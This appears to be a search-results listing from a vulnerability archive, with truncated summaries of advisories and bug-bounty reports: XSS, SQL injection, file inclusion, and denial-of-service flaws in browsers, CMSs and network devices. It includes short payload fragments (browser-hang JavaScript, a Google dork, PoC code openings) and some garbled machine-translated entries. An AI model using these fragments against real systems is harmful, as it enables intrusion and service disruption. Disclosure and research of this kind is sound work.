106 matches found
macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image
The attached tiff image causes a crash in ImageIO on the latest macOS and iOS. To reproduce the issue, the attached code tester.m can be used. I've attached another code snippet to reproduce the issue on iOS as well. With tester.m compiled with ASAN, processing the attached tiff image should cras...
Razer US: Authenticated DOM-based XSS in deals.razerzone.com via the rurl parameter.
The researcher discovered that deals.razerzone.com was vulnerable to Authenticated DOM-based XSS via the rurl parameter, which could allow account hijacking via session cookies. The researcher identified the specific code snippet and provided two PoCs with different techniques. Another great repo...
Brave Software: [DOS] Browser hangs on loading the code snippet
Summary: Basically the function location.reload is causing the browser to hang, as the browser is not able to handle multiple reloads, but a similar issue cannot be seen in Firefox and Chrome as I am able to close the current tab. Products affected: Latest Brave browser on Linux. Steps To Reproduce: Use the...
Brave Software: [DOS] denial of service using code snippet on brave browser
Summary: Brave browser hangs due to no validation for a code snippet, causing denial of service to users. Products affected: latest Brave browser on Linux. Steps To Reproduce: code snippet:- 1 window.location+='?\u202a\uFEFF\u202b'; OR 2 window.location+='?'+window.location.toString.split'';" Note ...
With Misfortune-Cookies-doom cookies to ROM-0 Bug patch
This article is just for fun, especially to those who like to adjust the system's embedded hack. So this is not a legitimate fix ROM-0 Bugs means fun is by one bug to fix another bug. Let's open the beginning to find our fun. As I an article the Misfortune Cookie decryption of the write, we can be...
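Huiwen Mobile Library: Obtaining User Information Without a Password
Brief description: By generating the authentication token, user information can be obtained with only the username. Details: The generation of the authentication token is implemented on the client side, and the generation method does not depend on the password. List of affected institutions: http://www.libsys.com.cn/huiwenappcenter2.php Proof of vulnerability: import java.io.UnsupportedEncodingException; import java.math.BigInteger; / Created by snail on 14-11-23. / public class LibToken public static String makeTokenString s...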
CMS Made Simple 1.11.9 - Multiple Vulnerabilities
Vulnerabilities in CMS Made Simple, version 1.11.9 Discovered by Pedro Ribeiro [email protected] of Agile Information Security Reported to [email protected] and [email protected] Disclosure: 28/02/2014 / Last updated: 12/10/2014 CMS Made Simple, an open source content management...
Sun Solaris 9 RPC Request Denial of Service Vulnerability
source: http://www.securityfocus.com/bid/21964/info The Solaris operating system is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the 'rpcbind(1M)' server, denying service to legitimate users. /...
Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (1)
source: http://www.securityfocus.com/bid/11258/info Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability. The issue is reported to present itself due to inefficiencies present when handling fragmented TC...
phpMyBitTorrent 2.0.4 - SQL Injection
Exploit Title: phpMyBitTorrent 2.0.4 SQL injection Google Dork: inurl:"user.php?op=register" Date: 14/FEB/2011 Author: [email protected] Software Link: http://sourceforge.net/projects/phpmybittorrent/ Version: 2.0.4 Tested on: nix...
NewsCMSlite Insecure Cookie Handling
www.BugReport.ir AmnPardaz Security Research Team Title: NewsCMSlite Vendor: http://www.katywhitton.com Bug: Insecure Cookie Handling Exploitation: Remote with browser Fix: N/A Original Advisory: http://www.bugreport.ir/index62.htm - Description: NewsCMSlite is an easy way to get regularly update...
OpenX 2.6.3 Local File Inclusion
I have found a local file inclusion exploit in OpenX 2.6.3, this is in the script "fc.php", located in /www/delivery/ Here is a snip of the code: snip include_once '../../init-delivery.php'; $MAXPLUGINSADPLUGINNAME = 'MAXtype'; if(!isset($_GET[$MAXPLUGINSADPLUGINNAME])) echo $MAXPLUGINSADPLUGINNAME . ' i...
OneCMS 2.4 Remote SQL Injection / Upload Vulnerabilities
WwW.BugReport.ir AmnPardaz Security Research Team Title: OneCMS Vulnerabilities Vendor: http://www.insanevisions.com Bugs: SQL Injection (Authentication bypass), Arbitrary file upload! Vulnerable Version: 2.4 (prior versions also may be affected) Exploitation: Remo...
RunCMS 1.6 - Local File Inclusion
WwW.BugReport.ir AmnPardaz Security Research & Penetration Testing Group Title: RunCms Multiple Vulnerabilities Vendor: http://www.runcms.org/ Bugs: Local File Inclusion, Modules Authorization Weakness Vulnerable Version: RunCMS 1.6 Halloween, 1.5.x prior version...
SERV-U 6.4 provide the right method, pass to kill SERV-U version
Modify ftpport 2 1 Modify the newdomain behind goldsun| IPas to the right of the server's IP address| Modify the newuser behind-IP=IP address the same as aboveto the right of the IP address of the server...OK..... Provide the right...will use FTP to add a can Execute command the user..... Have a...
Port interception with port hidden sniffing attacks
In Windows socket server application programming, the following statements are perhaps common: s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); saddr.sin_family = AF_INET; saddr.sin_addr.s_addr = htonl(INADDR_ANY); bind(s,(SOCKADDR *)&saddr,sizeof(saddr)); In fact, this which exists in a very big security...
Cisco VPN 3000 Concentrator <= 4.1.7, 4.7.2 (FTP) Remote Exploit
/ Cisco VPN Concentrator 3000 FTP remote exploit. A vulnerability exists in the Cisco VPN Concentrator 3000, an unauthenticated user may access the file system through manipulation of FTP service commands. An...
vwar150.txt
.: insecurity research team :. .advisory. 1o.o8.2oo6 Affected Application: VWar query" line 64: SELECT memberid, name, lastactivity line 65: FROM...
CVE-2004-1746
Cross-site scripting (XSS) vulnerability in index.php in PHP Code Snippet Library allows remote attackers to inject arbitrary web script or HTML via the (1) cat_select or (2) show parameters...
CVE-2004-1746
The CVE-2004-1746 entry describes a Cross-site scripting (XSS) vulnerability in PHP Code Snippet Library’s index.php, exploitable via the cat_select and show parameters. The underlying issue is inadequate input sanitization in index.php, allowing remote attackers to inject arbitrary JavaScript in...